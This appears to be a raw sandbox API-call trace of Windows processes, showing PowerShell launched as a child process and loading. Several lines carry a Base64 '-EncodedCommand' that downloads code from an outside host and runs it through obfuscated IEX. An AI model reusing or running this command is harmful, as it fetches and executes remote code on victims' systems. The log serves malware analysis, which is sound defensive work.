	[0417.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.696] SetErrorMode (uMode=0x1) returned 0x1
	[0417.696] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.696] SetErrorMode (uMode=0x1) returned 0x1
	[0417.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.697] SetErrorMode (uMode=0x1) returned 0x1
	[0417.697] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.697] SetErrorMode (uMode=0x1) returned 0x1
	[0417.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0417.697] SetErrorMode (uMode=0x1) returned 0x1
	[0417.698] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.698] SetErrorMode (uMode=0x1) returned 0x1
	[0417.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0417.698] SetErrorMode (uMode=0x1) returned 0x1
	[0417.698] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.698] SetErrorMode (uMode=0x1) returned 0x1
	[0417.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0417.699] SetErrorMode (uMode=0x1) returned 0x1
	[0417.699] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.699] SetErrorMode (uMode=0x1) returned 0x1
	[0417.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0417.699] SetErrorMode (uMode=0x1) returned 0x1
	[0417.699] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.700] SetErrorMode (uMode=0x1) returned 0x1
	[0417.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0417.700] SetErrorMode (uMode=0x1) returned 0x1
	[0417.700] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0417.700] SetErrorMode (uMode=0x1) returned 0x1
	[0417.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c85da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0417.701] SetErrorMode (uMode=0x1) returned 0x1
	[0417.701] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c85dbc0 | out: lpFindFileData=0x1c85dbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x48f080
	[0417.702] FindNextFileW (in: hFindFile=0x48f080, lpFindFileData=0x1c85dbd0 | out: lpFindFileData=0x1c85dbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0417.702] FindClose (in: hFindFile=0x48f080 | out: hFindFile=0x48f080) returned 1
	[0417.702] SetErrorMode (uMode=0x1) returned 0x1
	[0417.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c85dce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0417.703] SetErrorMode (uMode=0x1) returned 0x1
	[0417.703] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c85def0 | out: lpFileInformation=0x1c85def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0417.703] SetErrorMode (uMode=0x1) returned 0x1
	[0417.704] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0417.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.704] CoTaskMemFree (pv=0x46ad10) 
	[0417.706] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0417.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.706] CoTaskMemFree (pv=0x46ad10) 
	[0417.709] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0417.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.710] CoTaskMemFree (pv=0x46ad10) 
	[0417.719] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0417.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.720] CoTaskMemFree (pv=0x46ad10) 
	[0418.014] CoTaskMemAlloc (cb=0x3b) returned 0x1b994fa0
	[0418.014] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c85e0d8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c85e0d8) returned 0x4550
	[0418.015] CoTaskMemFree (pv=0x1b994fa0) 
	[0418.018] GetConsoleWindow () returned 0x102da
	[0418.025] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0418.025] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.025] CoTaskMemFree (pv=0x46ad10) 
	[0418.026] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0418.026] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0418.026] CoTaskMemFree (pv=0x46ad10) 
	[0418.032] CoTaskMemAlloc (cb=0x104) returned 0x46ad10
	[0418.032] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x46ad10, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0418.032] CoTaskMemFree (pv=0x46ad10) 
	[0418.034] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c85e120 | out: pNumArgs=0x1c85e120) returned 0x1b997f90*=""
	[0418.036] lstrlenW (lpString="-EncodedCommand") returned 15
	[0418.037] CoTaskMemAlloc (cb=0x22) returned 0x1b97ad30
	[0418.037] RtlMoveMemory (in: Destination=0x1b97ad30, Source=0x1b997fb2, Length=0x20 | out: Destination=0x1b97ad30) 
	[0418.037] CoTaskMemFree (pv=0x1b97ad30) 
	[0418.037] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0418.037] CoTaskMemAlloc (cb=0x2f4) returned 0x1b9982d0
	[0418.037] RtlMoveMemory (in: Destination=0x1b9982d0, Source=0x1b997fd2, Length=0x2f2 | out: Destination=0x1b9982d0) 
	[0418.037] CoTaskMemFree (pv=0x1b9982d0) 
	[0418.038] LocalFree (hMem=0x1b997f90) returned 0x0
	[0418.039] CoTaskMemAlloc (cb=0x804) returned 0x1b997f90
	[0418.039] GetConsoleTitleW (in: lpConsoleTitle=0x1b997f90, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0418.334] CoTaskMemFree (pv=0x1b997f90) 
	[0418.342] CoTaskMemAlloc (cb=0x38e) returned 0x1b997f90
	[0418.342] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c85e080*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3330128 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x3330128*(hProcess=0x368, hThread=0x364, dwProcessId=0x990, dwThreadId=0xd9c)) returned 1
	[0418.681] CoTaskMemFree (pv=0x1b997f90) 
	[0418.682] CloseHandle (hObject=0x364) returned 1
	[0418.682] CoTaskMemAlloc (cb=0x3b) returned 0x1b994fa0
	[0418.682] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c85e128, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c85e128) returned 0x4550
	[0418.683] CoTaskMemFree (pv=0x1b994fa0) 
	[0418.686] GetCurrentProcess () returned 0xffffffffffffffff
	[0418.686] GetCurrentProcess () returned 0xffffffffffffffff
	[0418.687] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c85e208, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c85e208*=0x364) returned 1

Process:
	id = "34"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x135f4000"
	os_pid = "0x534"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 182
	os_tid = 0xab8

	[0377.730] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0379.195] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0379.195] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0379.195] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0379.195] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0383.070] GetVersionExW (in: lpVersionInformation=0xcdb20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0383.072] GetVersionExW (in: lpVersionInformation=0xcdb20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdb20*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0383.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0383.527] GetVersionExW (in: lpVersionInformation=0xcd890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd890*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0383.528] SetErrorMode (uMode=0x1) returned 0x1
	[0383.529] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd9f0 | out: lpFileInformation=0xcd9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0383.530] SetErrorMode (uMode=0x1) returned 0x1
	[0383.534] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcdc60 | out: lpdwHandle=0xcdc60) returned 0x94c
	[0383.535] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c072d8 | out: lpData=0x2c072d8) returned 1
	[0383.538] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdbd8, puLen=0xcdbd0 | out: lplpBuffer=0xcdbd8*=0x2c07374, puLen=0xcdbd0) returned 1
	[0383.540] lstrlenW (lpString="䅁") returned 1
	[0383.549] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c07450, puLen=0xcdb40) returned 1
	[0383.550] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0383.552] CoTaskMemAlloc (cb=0x2e) returned 0x1f1180
	[0383.552] lstrcpyW (in: lpString1=0x1f1180, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0383.553] CoTaskMemFree (pv=0x1f1180) 
	[0383.553] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c074a4, puLen=0xcdb40) returned 1
	[0383.553] lstrlenW (lpString="System.Management.Automation") returned 28
	[0383.553] CoTaskMemAlloc (cb=0x3c) returned 0x129860
	[0383.554] lstrcpyW (in: lpString1=0x129860, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0383.554] CoTaskMemFree (pv=0x129860) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c07500, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0383.554] CoTaskMemAlloc (cb=0x20) returned 0x1ed2d0
	[0383.554] lstrcpyW (in: lpString1=0x1ed2d0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0383.554] CoTaskMemFree (pv=0x1ed2d0) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c07540, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.554] CoTaskMemAlloc (cb=0x44) returned 0x129860
	[0383.554] lstrcpyW (in: lpString1=0x129860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.554] CoTaskMemFree (pv=0x129860) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c075a8, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0383.554] CoTaskMemAlloc (cb=0x76) returned 0x191630
	[0383.554] lstrcpyW (in: lpString1=0x191630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0383.554] CoTaskMemFree (pv=0x191630) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c07644, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0383.554] CoTaskMemAlloc (cb=0x44) returned 0x129860
	[0383.554] lstrcpyW (in: lpString1=0x129860, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0383.554] CoTaskMemFree (pv=0x129860) 
	[0383.554] VerQueryValueW (in: pBlock=0x2c072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdb48, puLen=0xcdb40 | out: lplpBuffer=0xcdb48*=0x2c076a8, puLen=0xcdb40) returned 1
	[0383.554] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0383.554] CoTaskMemAlloc (cb=0x58) returned 0x1459e0
